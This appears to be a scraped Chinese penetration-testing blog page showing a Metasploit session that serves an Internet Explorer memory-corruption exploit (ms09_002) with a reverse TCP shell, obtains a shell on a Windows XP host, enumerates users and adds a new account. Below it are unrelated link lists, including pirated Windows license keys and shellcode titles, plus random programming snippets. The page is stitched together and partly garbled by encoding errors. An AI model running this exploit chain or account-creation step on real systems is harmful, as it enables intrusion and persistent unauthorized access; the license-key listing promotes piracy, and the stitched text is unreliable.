Welcome to the Metasploit Web Console!

| | _) |

__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|

| | | __/ | ( |\__ \ | | | ( | | |

_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|

_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 308 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 308 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/browser/ms09_002_memory_corruption

>> set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 0.0.0.0 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> set SRVHOST 172.16.2.100

SRVHOST => 172.16.2.100

>> set LHOST 172.16.2.100

LHOST => 172.16.2.100

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

SRVHOST 172.16.2.100 yes The local host to listen on.

SRVPORT 8080 yes The local port to listen on.

SSL false no Negotiate SSL for incoming connections

SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)

URIPATH no The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 172.16.2.100 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

>> exploit

[*] Exploit running as background job.

[*] Started reverse handler on 172.16.2.100:4444

[*] Using URL: http://172.16.2.100:8080/9wZVWxuy

[*] Server started.

>> back

>> sessions -l

Active sessions

===============

Id Type Information Connection

-- ---- ----------- ----------

1 shell 172.16.2.100:4444 -> 172.16.2.120:1125

>> sessions -i 1

sessions -i 1

'sessions' 2?ê??ú2??òía2??üá?£?ò22?ê??é??DDμ?3ìDò

?ò?ú′|àí???t?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> ipconfig /all

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : www-95a235b5556

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

SUPPORT_388945a0

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user shentouceshiwy /add

net user shentouceshiwy /add

?üá?3é1|íê3é?£

C:\Documents and Settings\Administrator.WWW-95A235B5556\×à??>

>> net user

net user

\\WWW-95A235B5556 μ?ó??§?ê?§

-------------------------------------------------------------------------------

Administrator Guest HelpAssistant

shentouceshiwy SUPPORT_388945a0

?üá?3é1|íê3é?£

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7的更多相关文章

  1. Windows XP PRO SP3 - Full ROP calc shellcode

    /*     Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode     Author: b33f (http://www.fuzzysec ...

  2. Windows XP with SP3大客户免激活日文版

    原贴地址:http://www.humin.com.cn/ja_windows_xp_professional_with_service_pack_3_x86_dvd_vl_x14-74058-iso ...

  3. “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windows XP Professional.vmx" was created by a VMware product

    “Invalid configuration file. File "I:/My Virtual Machines/Windows XP english Professional/Windo ...

  4. 渗透测试实例Windows XP SP2

    一.msf> use exploit/windows/dcerpc/ms03_026_dcom.看到命令提示符的改变表明该命令已经运行成功. 二.为漏洞利用代码设置必要的参数,show opti ...

  5. Windows XP SP2上安装.net 4

    1.安装 KB893803-v2-x86 2.安装dotnetfx35 3.安装dotNetFx40_Client_x86_x64 4.安装 NET Framework 4.0

  6. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  7. 渗透杂记-2013-07-13 windows/mssql/mssql_payload

    扫描一下 Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间 NSE: Loaded 49 scripts f ...

  8. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  9. 渗透杂记-2013-07-13 关于SMB版本的扫描

    smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console ...

  10. 最新的windows xp sp3序列号(绝对可通过正版验证)

    MRX3F-47B9T-2487J-KWKMF-RPWBY(工行版) 可用(强推此号) QC986-27D34-6M3TY-JJXP9-TBGMD(台湾交大学生版) 可用 CM3HY-26VYW-6J ...

随机推荐

  1. 怎样使java程序减少内存占用(转载)

    本文收集网上关于减少java程序占用的一些小知识点 (1)别用new Boolean(). 在很多场景中Boolean类型是必须的,比如JDBC中boolean类型的set与get都是通过Boolea ...

  2. 水的demo

  3. Windows RabbitMQ 命令

    启动: 后台运行:rabbitmq-server -detached D:\Program Files\RabbitMQ Server\rabbitmq_server-3.6.6\sbin>ra ...

  4. css3的新特性transform,transition,animation

    一.transform css3引入了一些可以对网页元素进行变换的属性,比如旋转,缩放,移动,或者沿着水平或者垂直方向扭曲(斜切变换)等等.这些的基础都是transform属性 transform属性 ...

  5. css旋转

    翻转180度 /* entire container, keeps perspective */ .flip-container { perspective: 1000; } /* flip the ...

  6. linux查看某个进程内存占用情况以及/proc/pid/status解释

    以nginx 为例1.toptop -b -n 1 |grep nginx|awk '{print "VIRT:"$5,"RES:"$6,"cpu:& ...

  7. Application Engine

    Exit(1) : Terminate the AE immediately and rollback all DB changes madeexit(0) : Terminate the AE im ...

  8. Java多线程开发系列之一:走进多线程

    对编程语言的基础知识:分支.选择.循环.面向对象等基本概念理解后,我们需要对java高级编程有一定的学习,这里不可避免的要接触到多线程开发. 由于多线程开发整体的系统比较大,我会写一个系列的文章总结介 ...

  9. listview和checkbox的冲突的用法

    package com.exaple.music; import java.util.List; import java.util.Timer; import java.util.TimerTask; ...

  10. Xstream解析XML

    <oschina> <catalog>1</catalog> <newsCount>0</newsCount> <pagesize&g ...